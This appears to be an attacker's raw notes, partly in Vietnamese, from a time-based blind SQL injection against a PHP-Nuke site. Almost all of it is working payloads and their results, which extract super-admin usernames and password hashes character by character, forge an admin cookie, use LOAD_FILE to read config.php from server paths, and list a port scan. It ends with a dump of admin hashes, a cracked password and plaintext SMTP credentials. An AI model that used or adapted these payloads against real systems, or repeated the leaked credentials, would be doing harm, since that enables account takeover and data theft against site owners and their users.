    a'+(SELECT IF(SUBSTRING(pwd,26,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,26,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,26,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,26,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,26,1) = CHAR(51),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB3
    a'+(SELECT IF(SUBSTRING(pwd,27,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,27,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,27,1) > CHAR(54),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,27,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,27,1) = CHAR(55),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37
    a'+(SELECT IF(SUBSTRING(pwd,28,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,28,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,28,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,28,1) = CHAR(70),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37F
    a'+(SELECT IF(SUBSTRING(pwd,29,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,29,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,29,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,29,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,29,1) = CHAR(50),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37F2
    a'+(SELECT IF(SUBSTRING(pwd,1,29) = CHAR(56, 49, 70, 70, 52, 65, 48, 52, 50, 68, 55, 52, 56, 67, 66, 52, 55, 66, 67, 50, 57, 54, 54, 70, 66, 51, 55, 70, 50),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b

    a'+(SELECT IF(SUBSTRING(pwd,30,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,30,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,30,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,30,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,30,1) = CHAR(68),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37F2D
    a'+(SELECT IF(SUBSTRING(pwd,31,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,31,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,31,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,31,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,31,1) > CHAR(48),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,31,1) = CHAR(48),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37F2D0
    a'+(SELECT IF(SUBSTRING(pwd,32,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,32,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,32,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,32,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,32,1) > CHAR(48),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,32,1) = CHAR(49),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB37F2D01
    => 81ff4a042d748cb47bc2966fb37f2d01

    a'+(SELECT IF(SUBSTRING(pwd,1,32) = CHAR(56, 49, 70, 70, 52, 65, 48, 52, 50, 68, 55, 52, 56, 67, 66, 52, 55, 66, 67, 50, 57, 54, 54, 70, 66, 51, 55, 70, 50, 68, 48, 49),sleep(15),null) FROM nuke_authors where radminsuper = '1' and aid =)+'b

    INSERT INTO `nuke_referer` VALUES (NULL,'http://google.com'), (44,'bbbb') ON DUPLICATE KEY UPDATE url='cccccccc'

    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(97),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(117),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,1,1) = CHAR(116),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(114),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(112),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,1,1) = CHAR(112),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => p

    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(97),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(104),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(100),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(102),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,2,1) > CHAR(103),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,2,1) = CHAR(104),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => ph
    a'+(SELECT IF(SUBSTRING(aid,3,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,3,1) > CHAR(104),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,3,1) > CHAR(100),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,3,1) = CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => pha
    a'+(SELECT IF(SUBSTRING(aid,4,1) = CHAR(109),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => pham
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(104),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(100),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) = CHAR(32),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(10),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,5,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,5,1) = CHAR(68),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => phamD
    a'+(SELECT IF(SUBSTRING(aid,6,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,6,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,6,1) > CHAR(104),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,6,1) > CHAR(107),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,6,1) > CHAR(105),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,6,1) = CHAR(105),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => phamDi
    a'+(SELECT IF(SUBSTRING(aid,7,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,7,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,7,1) > CHAR(104),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,7,1) > CHAR(107),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,7,1) > CHAR(109),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(aid,7,1) = CHAR(110),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => phamDin
    a'+(SELECT IF(SUBSTRING(aid,8,1) = CHAR(104),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => phamDinh

    a'+(SELECT IF(SUBSTRING(aid,1,8) = CHAR(112, 104, 97, 109, 68, 105, 110, 104),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung

    a'+(SELECT IF(SUBSTRING(aid,9,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,9,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,9,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,9,1) > CHAR(32),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,9,1) = CHAR(32),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => phamDinh

    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(32),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(10),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(1),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b
    a'+(SELECT IF(SUBSTRING(aid,10,1) > CHAR(1),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b
    a'+(SELECT IF(aid = CHAR(112, 104, 97, 109, 68, 105, 110, 104) ,sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b

    => "phamDinh" 81FF4A042D748CB47BC2966FB37F2D01

    a'+(SELECT IF(aid = CHAR(112, 104, 97, 109, 68, 105, 110, 104, 32) ,sleep(20),null) FROM nuke_authors where radminsuper = '1' and pwd=CHAR(56, 49, 70, 70, 52, 65, 48, 52, 50, 68, 55, 52, 56, 67, 66, 52, 55, 66, 67, 50, 57, 54, 54, 70, 66, 51, 55, 70, 50, 68, 48, 49))+'b

    cGhhbURpbmggOjgxRkY0QTA0MkQ3NDhDQjQ3QkMyOTY2RkIzN0YyRDAxOg==

    lang=english; admin=cGhhbURpbmg6ODFGRjRBMDQyRDc0OENCNDdCQzI5NjZGQjM3RjJEMDE6; SESScfc90a62c81b7bfc6f292320b1d0b8ca=01ijt7fd7upsp363d4unevgqc6; bblastvisit=1283349333; bblastactivity=0

    a'+(SELECT IF(SUBSTRING(admlanguage,1,1) > CHAR(111),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(admlanguage,1,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(admlanguage,1,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(admlanguage,1,1) > CHAR(10),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(admlanguage,1,1) > CHAR(47),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b
    a'+(SELECT IF( LENGTH(admlanguage) > 0),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b

    INSERT INTO `nuke_referer` VALUE (NULL, 'a'+(SELECT IF(SUBSTRING(aid,10,1) > 0),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b')

    a'+(SELECT IF( LENGTH(admlanguage) = 0,sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b
    => admlanguage = null
    a'+(SELECT IF( LENGTH(aid) = 9,sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b
    a'+(SELECT IF( LENGTH(aid) =8,sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b
    a'+(SELECT IF( LENGTH(pwd) =32,sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b

    "phamDinh" 81FF4A042D748CB47BC2966FB37F2D01

    lang=english; admin=cGhhbURpbmg6ODFGRjRBMDQyRDc0OENCNDdCQzI5NjZGQjM3RjJEMDE6;

    cGhhbURpbmg6ODFGRjRBMDQyRDc0OENCNDdCQzI5NjZGQjM3RjJEMDE6

    a'+(SELECT )+'b

    SELECT COUNT(*) FROM `nuke_authors` WHERE radminsuper='1'

    a'+(SELECT IF(COUNT(*)=1,sleep(10),null) FROM `nuke_authors` WHERE radminsuper='1')+'b Sai

    a'+(SELECT IF(COUNT(*)=4,sleep(10),null) FROM `nuke_authors` WHERE radminsuper='1')+'b dung
    => co' 4 supper admin

    a'+(SELECT IF(SUBSTRING(aid,1,1) > CHAR(1),sleep(10),null) FROM nuke_authors where radminsuper = '1' and aid not like '%phamDinh%')+'b

    CHAR(110, 101, 119, 97, 100, 109, 105, 110)

    a'+(SELECT IF(SUBSTRING(aid,1,8) > CHAR(110, 101, 119, 97, 100, 109, 105, 110),sleep(10),null) FROM nuke_authors where radminsuper = '1' and aid not in ('admin'))+'b

    SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(1),sleep(3),null) FROM nuke_authors where radminsuper = '1'
    SELECT group_concat(aid) FROM nuke_authors where radminsuper = '1'

    admin,newadmin,kaka

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(96),sleep(5),null) FROM nuke_authors where radminsuper = '1')+'b

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b

    INSERT INTO nuke_referer VALUES (NULL, 'a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b')

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(10),sleep(3),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(47),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(80),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(75),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(78),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,1) = CHAR(80),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => P

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,80),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,72),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) > CHAR(80,71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,2) = CHAR(80,72),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PH

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,3) = CHAR(80,72,65),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PHA
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,4) = CHAR(80,72,65,77),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b
    => PHAM

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,5) = CHAR(80,72,65,77,68),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PHAMD

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,8) = CHAR(80,72,65,77,68,73,78,72),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PHAMDINH
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,9) = CHAR(80,72,65,77,68,73,78,72,44),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PHAMDINH,
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) = CHAR(80,72,65,77,68,73,78,72,44,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) = CHAR(80,72,65,77,68,73,78,72,44,42),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b sai

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,42),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,80),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,75),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,73),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) > CHAR(80,72,65,77,68,73,78,72,44,72),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,10) = CHAR(80,72,65,77,68,73,78,72,44,72),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => PHAMDINH,H

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,80),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,75),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,78),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) > CHAR(80,72,65,77,68,73,78,72,44,72,79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,11) = CHAR(80,72,65,77,68,73,78,72,44,72,79),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b
    => PHAMDINH,HO

    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,12) > CHAR(80,72,65,77,68,73,78,72,44,72,79,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,12) > CHAR(80,72,65,77,68,73,78,72,44,72,79,80),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,12) > CHAR(80,72,65,77,68,73,78,72,44,72,79,70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,12) > CHAR(80,72,65,77,68,73,78,72,44,72,79,66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,12) = CHAR(80,72,65,77,68,73,78,72,44,72,79,65),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b
    => PHAMDINH,HOA
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,13) > CHAR(80,72,65,77,68,73,78,72,44,72,79,65,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(group_concat(aid),1,13) > CHAR(80,72,65,77,68,73,78,72,44,72,79,65,64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b

    Vao duoc admin
    cGhhbWRpbmg6ODFmZjRhMDQyZDc0OGNiNDdiYzI5NjZmYjM3ZjJkMDE6

    PhamDinh
    HoaSoan
    NangChieu
    Luong77

    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,LOAD_FILE('C:/wamp/www/PHP-Nuke-8.0/html/config.php'))
    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,
    SUBSTRING(LOAD_FILE('/home/danguyen/public_html/vn/config.php'),2720,100))

    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,
    SUBSTRING(LOAD_FILE('/home/danguyen/public_html/vn/config.php'),2720,99)+'a')

    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,
    SUBSTRING(LOAD_FILE('/home/danguyen/public_html/vn/config.php'),2720,99))/*'');

    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,
    SUBSTRING(LOAD_FILE('C:/wamp/www/PHP-Nuke-8.0/html/config.php'),2720,100)), (NULL,'http://google.com')

    INSERT INTO nuke_referer VALUES (NULL, 'http://google.com'),(NULL,
    SUBSTRING(LOAD_FILE('/home/danguyen/public_html/vn/config.php'),1,100)), (NULL,'http://google.com')

    nghiemY
    19-S0nTra-63

    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    110/tcp open pop3
    143/tcp open imap
    443/tcp open https
    465/tcp open smtps
    993/tcp open imaps
    995/tcp open pop3s
    3306/tcp open mysql
    8443/tcp open https-alt

    ////////// DATA BASE khai thac duoc

    INSERT INTO nuke_authors VALUES ( 'PhamDinh', 'God', 'http://', '[email protected]', '81ff4a042d748cb47bc2966fb37f2d01', '98', '1', '');
    81ff4a042d748cb47bc2966fb37f2d01
    INSERT INTO nuke_authors VALUES ( 'HoaSoan', 'HoaSoan', '', '[email protected]', '80235f6fd22ed66bd94fa2a64d75b2d1', '31', '1', '');
    INSERT INTO nuke_authors VALUES ( 'NangChieu', 'NangChieu', '', '[email protected]', 'e0cfe47620135703833907e28ef878c9', '7', '1', '');
    INSERT INTO nuke_authors VALUES ( 'Luong77', 'God', '', '', '1bbd886460827015e5d605ed44252251', '0', '1', '');

    1bbd886460827015e5d605ed44252251 => 11111111

    INSERT INTO nuke_bbconfig VALUES ( 'smtp_username', 'nghiemY');
    INSERT INTO nuke_bbconfig VALUES ( 'smtp_password', '19-S0nTra-63');